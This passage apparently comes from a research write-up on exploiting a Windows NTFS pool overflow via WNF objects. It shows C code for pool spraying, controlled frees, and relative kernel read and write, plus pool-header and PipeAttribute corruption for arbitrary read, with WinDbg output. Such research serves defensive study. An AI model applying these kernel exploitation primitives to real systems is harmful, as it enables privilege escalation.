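    for (ULONG i = 0; i < SPRAY_COUNT; i++) {
        /* 3 = WnfTemporaryStateName, 4 = WnfDataScopeMachine */
        NtCreateWnfStateName(&g_names[i], 3, 4, FALSE, NULL, 0x1000, psd);

        /* alloc_size bytes of data land in a paged pool chunk of roughly
           alloc_size + 0x10 (_WNF_STATE_DATA) + 0x10 (_POOL_HEADER). */
        NtUpdateWnfStateData(&g_names[i], buf, alloc_size, NULL, NULL, 0, 0);
    }
}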

Using this we can spray controlled sizes within the paged pool and fill it with controlled objects:

1: kd> !pool ffffbe0f623d7190
Pool page ffffbe0f623d7190 region is Paged pool
 ffffbe0f623d7020 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7050 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7080 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d70b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d70e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7110 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7140 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
*ffffbe0f623d7170 size:   30 previous size:    0  (Allocated) *Wnf  Process: ffff87056ccc0080
        Pooltag Wnf  : Windows Notification Facility, Binary : nt!wnf
 ffffbe0f623d71a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d71d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7200 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7230 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7260 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7290 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d72c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d72f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7320 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7350 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7380 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d73b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d73e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7410 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7440 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7470 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d74a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d74d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7500 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7530 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7560 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7590 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d75c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d75f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7620 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7650 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7680 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d76b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d76e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7710 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7740 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7770 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d77a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d77d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7800 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7830 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7860 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7890 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d78c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d78f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7920 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7950 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7980 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d79b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d79e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a10 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a40 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a70 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7aa0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ad0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b00 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7bc0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7bf0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7cb0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ce0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d10 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d40 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d70 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7da0 size:   30 previous size:    0  (Allocated)  Ntf0
 ffffbe0f623d7dd0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e00 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ec0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ef0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7fb0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080

This is useful for filling the pool with allocations of a controlled size and controlled contents, so we continue our investigation of the WNF feature.

Controlled Free

The next thing which would be useful from an exploit perspective would be the ability to free WNF chunks on demand within the paged pool.

There is also an API call which does this, NtDeleteWnfStateData, which calls into ExpWnfDeleteStateData and in turn ends up freeing our allocation.

Whilst researching this area, I was able to reuse the freed chunk straight away with a new allocation. More investigation is needed to determine if the LFH makes use of delayed free lists; in my empirical testing I did not seem to be hitting this after a large spray of Wnf chunks.
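
Reusing the declarations from the spray sketch above, a controlled free followed by an immediate reclaim could look roughly like this (the NtDeleteWnfStateData prototype is the commonly published undocumented one, and the assumption that a same-sized allocation reuses the hole is based only on the empirical behaviour described above):

NTSTATUS NTAPI NtDeleteWnfStateData(const MY_WNF_STATE_NAME *StateName,
                                    const VOID *ExplicitScope);

void FreeAndReclaim(const MY_WNF_STATE_NAME *victim, MY_WNF_STATE_NAME *replacement,
                    PSECURITY_DESCRIPTOR psd, const void *data, ULONG size)
{
    /* Free the victim's _WNF_STATE_DATA chunk on the paged pool... */
    NtDeleteWnfStateData(victim, NULL);

    /* ...and immediately allocate a same-sized chunk to take its place. */
    NtCreateWnfStateName(replacement, 3, 4, FALSE, NULL, 0x1000, psd);
    NtUpdateWnfStateData(replacement, data, size, NULL, NULL, 0, 0);
}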

Relative Memory Read

Now we have the ability to perform both a controlled allocation and a controlled free, but what about the data itself, and can we do anything useful with it?

Well, looking back at the structure, you may well have spotted that the AllocatedSize and DataSize are contained within it:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

DataSize denotes the size of the actual data following the structure in memory and is used for bounds checking within the NtQueryWnfStateData function. The actual memory copy operation takes place in the function ExpWnfReadStateData:

So the obvious thing here is that if we can corrupt DataSize then this will give relative kernel memory disclosure.

I say relative because the _WNF_STATE_DATA structure is pointed at by the StateData pointer of the _WNF_NAME_INSTANCE which it is associated with:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Having this relative read now allows disclosure of other adjacent objects within the pool. Some output as an example from my code:

found corrupted element changeTimestamp 54545454 at index 4972
len is 0xff
41 41 41 41 42 42 42 42  43 43 43 43 44 44 44 44  |  AAAABBBBCCCCDDDD
00 00 03 0B 57 6E 66 20  E0 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 0B 57 6E 66 20  D0 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 0B 57 6E 66 20  80 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 03 4E 74 66 30  70 76 6B D8 F9 97 D9 42  |  ....Ntf0pvk....B
60 D6 55 AA 85 B4 FF FF  01 00 00 00 00 00 00 00  |  `.U.............
7D B0 29 01 00 00 00 00  41 41 41 41 41 41 41 41  |  }.).....AAAAAAAA
00 00 03 0B 57 6E 66 20  20 76 6B D8 F9 97 D9 42  |  ....Wnf  vk....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41     |  AAAAAAAAAAAAAAA

At this point there are many interesting things which can be leaked out, especially considering that both the vulnerable NTFS chunk and the WNF chunk can be positioned next to other interesting objects. Items such as the ProcessBilled field can also be leaked using this technique.

We can also use the ChangeStamp value to determine which of our objects is corrupted when spraying the pool with _WNF_STATE_DATA objects.
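
A sketch of how the corrupted entry can be located and the out-of-bounds data read back (reusing the declarations from the spray sketch; the NtQueryWnfStateData prototype is the commonly published undocumented one and is an assumption here):

NTSTATUS NTAPI NtQueryWnfStateData(const MY_WNF_STATE_NAME *StateName, const VOID *TypeId,
                                   const VOID *ExplicitScope, ULONG *ChangeStamp,
                                   VOID *Buffer, ULONG *BufferSize);

/* Walk the sprayed state names; the one whose ChangeStamp no longer matches the
   expected value is the corrupted _WNF_STATE_DATA, and its (corrupted) DataSize
   now lets us read past the end of the original allocation. */
int FindCorruptedAndLeak(UCHAR *leak, ULONG leak_size)
{
    for (ULONG i = 0; i < SPRAY_COUNT; i++) {
        ULONG stamp = 0;
        ULONG size  = leak_size;
        NTSTATUS status = NtQueryWnfStateData(&g_names[i], NULL, NULL, &stamp, leak, &size);
        if (status >= 0 && stamp != 1) {   /* one update performed, so anything else is corruption */
            return (int)i;                 /* leak[] now contains adjacent pool memory */
        }
    }
    return -1;
}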

Relative Memory Write

So what about writing data outside the bounds?

Taking a look at the NtUpdateWnfStateData function, we end up with an interesting call: ExpWnfWriteStateData((__int64)nameInstance, InputBuffer, Length, MatchingChangeStamp, CheckStamp). Below is some of the content of the ExpWnfWriteStateData function:

We can see that if we corrupt the AllocatedSize, represented by v12[1] in the code above, so that it is bigger than the actual size of the data, then the existing allocation will be used and a memcpy operation will corrupt further memory.

So at this point it's worth noting that the relative write has not really given us anything more than we already had with the NTFS overflow. However, as the data can be both read and written back using this technique, it opens up the ability to read data, modify certain parts of it and write it back.
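
In the same spirit, once the AllocatedSize and DataSize of a corrupted _WNF_STATE_DATA are larger than the real allocation, the same pair of calls gives a relative read-modify-write over adjacent memory. A sketch, reusing the declarations from the earlier sketches:

/* Read the adjacent memory through the enlarged DataSize, patch one byte, and
   write everything back through the enlarged AllocatedSize. */
void RelativeReadModifyWrite(const MY_WNF_STATE_NAME *corrupted, ULONG oob_size,
                             ULONG offset, UCHAR value)
{
    UCHAR buf[0x1000];
    ULONG stamp = 0, size = oob_size;

    NtQueryWnfStateData(corrupted, NULL, NULL, &stamp, buf, &size);    /* relative read  */
    buf[offset] = value;                                               /* targeted patch */
    NtUpdateWnfStateData(corrupted, buf, oob_size, NULL, NULL, 0, 0);  /* relative write */
}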

_POOL_HEADER BlockSize Corruption to Arbitrary Read using Pipe Attributes

As mentioned previously, when I first started investigating this vulnerability, I was under the impression that the pool chunk needed to be very small in order to trigger the underflow, but this wrong assumption led to me trying to pivot to pool chunks of a more interesting variety. By default, within the 0x30 chunk segment alone, I could not find any interesting objects which could be used to achieve arbitrary read.

Therefore my approach was to use the NTFS overflow to corrupt the BlockSize within the _POOL_HEADER of a 0x30-sized WNF chunk.

nt!_POOL_HEADER
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00000011 (0x3)
   +0x002 PoolType         : 0y00000011 (0x3)
   +0x000 Ulong1           : 0x3030000
   +0x004 PoolTag          : 0x4546744e
   +0x008 ProcessBilled    : 0x0057005c`007d0062 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x62
   +0x00a PoolTagHash      : 0x7d

By ensuring that the PoolQuota bit of the PoolType is not set, we can avoid any integrity checks for when the chunk is freed.

By setting the BlockSize to a different size, once the chunk is freed using our controlled free, we can force the chunk's address to be stored within the wrong lookaside list for its size.

We can then allocate another object of a different size, matching the size we wrote when corrupting the chunk, so that it is served from that lookaside list and takes the place of this object.

Finally, we can then trigger corruption again and therefore corrupt our more interesting object.

Initially I demonstrated this being possible using another WNF chunk of size 0x220:

1: kd> !pool @rax
Pool page ffff9a82c1cd4a30 region is Paged pool
 ffff9a82c1cd4000 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4030 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4060 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4090 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd40c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd40f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4120 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4150 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4180 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd41b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd41e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4210 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4240 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4270 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd42a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd42d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4300 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4330 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4360 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4390 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd43c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd43f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4420 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4450 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4480 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd44b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd44e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4510 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4540 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4570 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd45a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd45d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4600 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4630 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4660 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4690 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd46c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd46f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4720 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4750 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4780 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd47b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd47e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4810 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4840 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4870 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd48a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd48d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4900 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4930 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4960 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4990 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd49c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd49f0 size:   30 previous size:    0  (Free)       NtFE
*ffff9a82c1cd4a20 size:  220 previous size:    0  (Allocated) *Wnf  Process: ffff8608b72bf080
        Pooltag Wnf  : Windows Notification Facility, Binary : nt!wnf
 ffff9a82c1cd4c30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4c60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4c90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4cc0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4cf0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080

However, the main thing here is the ability to find a more interesting object to corrupt. As a quick win, the PipeAttribute object from the great paper https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pool_overflow_exploitation_since_windows_10_19h1/SSTIC2020-Article-pool_overflow_exploitation_since_windows_10_19h1-bayet_fariello.pdf was also used.

typedef struct pipe_attribute {
    LIST_ENTRY list;
    char* AttributeName;
    size_t ValueSize;
    char* AttributeValue;
    char data[0];
} pipe_attribute_t;

As PipeAttribute chunks are also of a controllable size and allocated on the paged pool, it is possible to place one adjacent to either a vulnerable NTFS chunk or a WNF chunk which allows relative writes.

Using this layout we can corrupt the PipeAttribute‘s Flink pointer and point this back to a fake pipe attribute as described in the paper above. Please refer back to that paper for more detailed information on the technique.

Diagrammatically we end up with the following memory layout for the arbitrary read part:

Whilst this worked and provided a nice reliable arbitrary read primitive, the original aim was to explore WNF more to determine how an attacker may have leveraged it.

The journey to arbitrary write

After taking a step back from this minor PipeAttribute detour, and with the realisation that I could actually control the size of the vulnerable NTFS chunks, I started to investigate whether it was possible to corrupt the StateData pointer of a _WNF_NAME_INSTANCE structure. So long as the DataSize and AllocatedSize at the target location could be aligned to sane values, the bounds checking within ExpWnfWriteStateData would then pass.

Looking at the creation of the _WNF_NAME_INSTANCE we can see that it will be of size 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. This ends up being put into a chunk of 0xC0 within the segment pool:

So the aim is to have the following occurring:

We can perform a spray as before using any size of _WNF_STATE_DATA which will lead to a _WNF_NAME_INSTANCE instance being allocated for each _WNF_STATE_DATA created.

Therefore we can end up with our desired memory layout, with a _WNF_NAME_INSTANCE adjacent to our overflowing NTFS chunk, as follows:

 ffffdd09b35c8010 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c80d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8190 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
*ffffdd09b35c8250 size:   c0 previous size:    0  (Allocated) *NtFE
        Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffffdd09b35c8310 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080       
 ffffdd09b35c83d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8490 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8550 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8610 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c86d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8790 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8850 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8910 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c89d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8a90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8b50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8c10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8cd0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8d90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8e50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8f10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080

We can see before the corruption the following structure values:

1: kd> dt _WNF_NAME_INSTANCE ffffdd09b35c8310+0x10
nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : 0xffffdd09`ad45d4a0 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : 0xffffdd09`b35b3e10 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : 1
   +0x068 PermanentDataStore : (null) 
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY [ 0xffffdd09`b35c8398 - 0xffffdd09`b35c8398 ]
   +0x088 TemporaryNameListEntry : _LIST_ENTRY [ 0xffffdd09`b35c8ee8 - 0xffffdd09`b35c85e8 ]
   +0x098 CreatorProcess   : 0xffff8d87`686c8080 _EPROCESS
   +0x0a0 DataSubscribersCount : 0n0
   +0x0a4 CurrentDeliveryCount : 0n0

Then after our NTFS extended attributes overflow has occurred and we have overwritten a number of fields:

1: kd> dt _WNF_NAME_INSTANCE ffffdd09b35c8310+0x10
nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
